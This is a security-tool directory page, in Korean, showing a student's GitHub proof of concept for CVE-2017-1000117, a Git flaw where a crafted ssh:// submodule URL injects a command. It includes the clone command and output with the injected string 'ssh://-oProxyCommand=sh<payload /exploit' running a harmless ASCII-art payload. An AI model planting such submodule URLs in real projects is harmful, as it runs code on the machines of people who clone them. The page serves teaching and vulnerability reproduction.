Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-1000117 — CVE-2017-1000117 취약점 재현 (PoC+Exp) | Kitploit
도구/GitHubGitHub/anonymking/cve-2017-1000117
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117 취약점 재현 (PoC+Exp)

저장소 보기
3297년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-1000117

프로젝트 소개

  • 사이버 보안 과정 설계 주제 중 하나
  • CVE-2017-1000117 취약점 재현 (PoC+Exp)
  • Git + SSH

취약점 소개:

  • 취약점 이름: Git 명령어 주입 취약점
  • CNNVD 번호: CNNVD-201708-670
  • 위험 등급: 중간 위험
  • CVE 번호: CVE-2017-1000117
  • 취약점 유형: 명령어 주입
  • 발표일: 2017-08-16
  • 위협 유형: 원격
  • 업데이트일: 2017-10-17
  • 제조사: git-scm
  • 취약점 출처: TrevorJay
  • 취약점 개요: Git은 미국 소프트웨어 개발자 리누스 토르발스(Linus Torvalds)가 개발한 무료 오픈 소스 분산 버전 관리 시스템입니다. Git 2.7.5 이전 버전에는 명령어 취약점이 존재합니다. 원격 공격자는 특수 제작된 'ssh://...' URL을 이용하여 이 취약점을 통해 임의의 장치에서 이미 종료된 프로그램을 실행할 수 있습니다.

이용 과정

  • 취약점이 있는 범위의 Git 도구 설치(Git for Linux), Git for Windows)
  • 여기서는 git-2.12.1 버전을 선택했습니다(직접 테스트한 결과 Linux와 Windows에서 모두 사용 가능합니다)(Linux 및 Windows에 해당하는 2.12.1 버전의 다운로드 주소는 각각 git-2.12.1.tar.gz, Git-2.12.1-64-bit.tar.bz2 입니다)
  • Git을 설치한 후 바로 서브모듈을 포함하여 프로젝트를 클론합니다: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
  • 부처님을 보면 취약점이 재현된 것입니다. payload의 악성 코드가 성공적으로 실행되었습니다.

2019/06/21 10:30 업데이트

  • 보고서를 작성하다가 갑자기 이 취약점이 CVE-2018-17456 취약점과 매우 유사하다는 것을 발견했습니다. 단지 표현 방식만 다를 뿐, 근본 원인은 모두 기호 "-"를 올바르게 구문 분석하지 못하고 이를 파라미터로 잘못 해석하여 임의 코드 실행이 발생한 것입니다.
  • CVE-2018-17456 취약점 이용에 대한 참고 글: [《Git Submodule 漏洞(CVE-2018-17456)分析》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

2019/06/21 19:39 업데이트

  • 관련 자료를 찾다가 또 매우 유사한 취약점 CVE-2018-11235를 발견했습니다.
  • CVE-2018-11235 취약점에 대한 참고 자료: CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Git远程代码执行漏洞(CVE-2018-11235)的详细分析
도구 다운로드